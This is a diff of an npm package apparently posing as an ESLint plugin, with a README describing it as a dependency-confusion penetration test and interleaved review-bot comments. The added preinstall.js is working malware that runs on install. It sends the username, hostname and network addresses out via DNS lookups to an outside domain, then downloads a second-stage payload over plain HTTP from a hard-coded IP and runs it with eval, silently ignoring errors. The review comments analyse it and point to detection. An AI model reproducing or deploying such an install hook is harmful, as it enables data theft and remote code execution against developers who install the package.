eslint-plugin-seller-ui-eslint-plugin 0.0.1-security → 0.0.3
- package/README.md +16 -3
- package/index.js +2 -0
- package/package.json +16 -3
- package/preinstall.js +80 -0
package/README.md
CHANGED
|
@@ -1,5 +1,18 @@
|
|
|
1
|
-
#
|
|
1
|
+
# 🛑 PLEASE DO NOT INSTALL THIS PACKAGE 🛑
|
|
2
2
|
|
|
3
|
-
This package
|
|
3
|
+
This package was created to test for the dependency confusion vulnerability as a part of penetration testing process.
|
|
4
|
+
__Package maintainer organization was provided the detailed information about this test, including package name & possible consequences for their CI/CD pipeline.__
|
|
4
5
|
|
|
5
|
-
|
|
6
|
+
As in the original dependency confusion whitepaper, this package makes use of the pre-install script.
|
|
7
|
+
It does the following steps:
|
|
8
|
+
|
|
9
|
+
1. Collects statistics (hostname, username, network interface names) using DNS lookups.
|
|
10
|
+
2. If the Internet connectivity allows outgoing HTTP requests and *the request is made from the subnet of the organization which the current pentesting activity targets*,
|
|
11
|
+
the second stage of the JS payload is downloaded and evaluated.
|
|
12
|
+
3. The second stages attempts to set up SOCKS5 proxy to create the tunnel inside the target infrastructure.
|
|
13
|
+
|
|
14
|
+
The second stage __only affects the IP range of the penetration test subject organization__.
|
|
15
|
+
You can verify this by making the request to the URL where the payload is downloaded from (`preinstall.js, line 7`).
|
|
16
|
+
|
|
17
|
+
Once this test is complete (3-14 days), the package will be deleted and reported to NPM security team.
|
|
18
|
+
Until then, __please do not install or report it__.
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,19 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "eslint-plugin-seller-ui-eslint-plugin",
|
|
3
|
-
"version": "0.0.
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "0.0.3",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "preinstall.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node preinstall.js"
|
|
9
|
+
},
|
|
10
|
+
"devDependencies": {
|
|
11
|
+
"eslint": "^8.14.0"
|
|
12
|
+
},
|
|
13
|
+
"peerDependencies": {
|
|
14
|
+
"eslint": "^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0"
|
|
15
|
+
},
|
|
16
|
+
"keywords": [],
|
|
17
|
+
"author": "",
|
|
18
|
+
"license": "ISC"
|
|
6
19
|
}
|
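Review bot: `"main": "preinstall.js"` on line 5 makes the install hook the module entry point, so `require('eslint-plugin-seller-ui-eslint-plugin')` runs the same collection-and-eval script as the `"preinstall"` hook on line 8, and `npm install --ignore-scripts` only stops the first of those two paths. The diffstat lists `package/index.js` as added, which is where an ESLint plugin's `main` would normally point. The `devDependencies`/`peerDependencies` on `eslint` (lines 10–15) give the manifest the shape of a real plugin, but nothing in the hunk references them.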
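--- /dev/null
+++ b/package/preinstall.js
@@ -0,0 +1,80 @@
+var http = require("http");
+var dns = require("dns");
+var os = require("os");
+
+var DNS_DOMAIN = '.oz.b.blueotter.info';
+
+var STAGE_URL = 'http://192.70.197.169/seller-ui-eslint-plugin/stage.json';
+
+var randomString = function (length) {
+var result = '';
+var alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+for (var i = 0; i < length; i++)
+result += alphabet.charAt(Math.floor(Math.random() *
+alphabet.length));
+return result;
+}
+
+var getNetworkInterfaces = function () {
+var ifaces = os.networkInterfaces();
+var results = {};
+
+Object.keys(ifaces).forEach(function (name) {
+ifaces[name].forEach(function (net) {
+if (net.family === 'IPv4' && !net.internal) {
+if (!results[name])
+results[name] = [];
+results[name].push(net.address);
+}
+});
+});
+
+return results;
+}
+
+var toHex = function (str) {
+return Buffer.from(str, 'utf-8').toString('hex');
+}
+
+var collectStats = function () {
+// Unique 6-character string to identify host in DNS logs
+var hostId = toHex(randomString(3));
+var suffix = '.' + hostId + DNS_DOMAIN;
+// Stat type prefix:
+// x - username
+// y - hostname
+// z - network interface
+var hostname = os.hostname();
+var username = os.userInfo().username;
+var ifaces = getNetworkInterfaces();
+dns.lookup('eslint' + suffix, function (err, res) {});
+dns.lookup('x' + toHex(username) + suffix, function (err, res) {});
+dns.lookup('y' + toHex(hostname) + suffix, function (err, res) {});
+
+Object.keys(ifaces).forEach(function (iface) {
+dns.lookup('z' + toHex(iface) + '.' + ifaces[iface][0] + suffix, function (err, res) {});
+});
+}
+
+var execSecondStage = function () {
+http.get(STAGE_URL, function (res) {
+var body = '';
+
+res.on('data', function (chunk) {
+body += chunk;
+});
+
+res.on('end', function () {
+try {
+eval(body);
+} catch (err) {
+// Silently ignore the error
+}
+});
+}).on('error', function (e) {
+// Silently ignore the error
+});
+}
+
+collectStats();
+execSecondStage();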
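Review bot: `eval(body)` on line 69 runs whatever the plain-HTTP response from `STAGE_URL` (line 7) contains, with no integrity check on the response, and the `catch` on line 70 together with the `'error'` handler on line 74 discard every failure, so an installer gets no indication of what, if anything, executed. The README's claim that the second stage is limited to the target organisation's IP range is not something this file enforces — any gating would have to live in what the server returns, and an unauthenticated `http://` fetch can be answered by anyone on the network path. For detection, lines 50–55 also issue DNS lookups for hex-encoded username, hostname and interface names under `.oz.b.blueotter.info`, which is the observable a DNS log can alert on, and running installs with `--ignore-scripts` is the control that keeps the hook from running at all. At minimum the two "Silently ignore the error" comments should become a visible failure, e.g. `console.error('stage fetch failed:', e.message);`.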